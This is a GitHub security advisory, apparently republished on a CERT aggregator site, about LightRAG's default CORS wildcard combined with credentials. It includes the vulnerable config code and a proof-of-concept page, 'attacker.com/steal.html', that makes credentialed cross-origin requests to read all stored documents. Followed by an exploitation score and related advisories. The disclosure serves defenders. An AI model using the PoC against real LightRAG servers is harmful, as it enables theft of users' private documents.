GHSA-6x6h-qqr7-855w: LightRAG: CORS Wildcard + Credentials Enables Any-Origin Credentialed Requests
Summary
The server defaults to CORS_ORIGINS=* combined with allow_credentials=True. Starlette's CORSMiddleware echoes the requesting origin in preflight responses when credentials are enabled, meaning every origin is effectively whitelisted for credentialed cross-origin requests. Any malicious website can perform authenticated API calls on behalf of a logged-in user.
Details
lightrag/api/config.py:639
args.cors_origins = get_env_value("CORS_ORIGINS", "*") # default wildcard
lightrag/api/lightrag_server.py:1379
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # any origin
allow_credentials=True, # credentials — PROBLEM with wildcard
allow_methods=["*"],
allow_headers=["*"],
)
Starlette CORSMiddleware (confirmed in source):
preflight_explicit_allow_origin = not allow_all_origins or allow_credentials
= not True or True = True → echoes the requesting origin back, not "*"
Result: every origin receives Access-Control-Allow-Credentials: true
PoC
Host on any origin. Open in browser where user is logged in to LightRAG:
<!-- attacker.com/steal.html -->
<script>
const TARGET = "http://lightrag-server:9621";
(async () => {
// Get victim token (or re-use existing session)
const r1 = await fetch(${TARGET}/login, {
method: "POST", credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
body: "username=victim&password=known_pass"
});
const { access_token } = await r1.json();
// Exfiltrate all documents
const docs = await (await fetch(${TARGET}/documents, {
credentials: "include",
headers: { Authorization: Bearer ${access_token} }
})).json();
console.log("STOLEN DOCS:", docs);
})();
</script>
Impact
Permissive cross-domain policy (CWE-942). Any website visited by an authenticated LightRAG user can silently make authenticated API requests, exfiltrating all documents and knowledge graph data or performing destructive actions such as deleting the entire document store.
Details
Original advisory: https://github.com/advisories/GHSA-6x6h-qqr7-855w
Exploitation outlook
EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.
- Low exploitation riskCVE-2026-617360.30% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 23% of all scored CVEs.
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-61736 | coverage & exploitation status | NVD · CVE.org |
Same CVEs, other sources
How other CERTs, PSIRTs and databases cover the vulnerabilities in this advisory.
More from GitHub Security Advisories
- mediumGHSA-jr6p-8pjj-mfx6: Capsule has an incomplete fix of CVE-2026-22872: TenantResource RawItems and Generators s…2026-07-31
- mediumGHSA-68cj-mvg9-rgm2: Capsule: CapsuleConfiguration NodeMetadata regex fields lack webhook validation, allowing…2026-07-31
- mediumGHSA-ff84-5f28-78qj: re2: Out-of-bounds heap read in `exec`/`test`/`match` via attacker-influenced `lastIndex`…2026-07-31
- mediumGHSA-6hxr-mr5r-9836: re2: Global `String.prototype.match` with an empty-matchable pattern never advances → inf…2026-07-31
- mediumGHSA-x83g-979r-f5fh: Sylius Mollie Plugin has unauthenticated IDOR that leaks order token and customer PII2026-07-31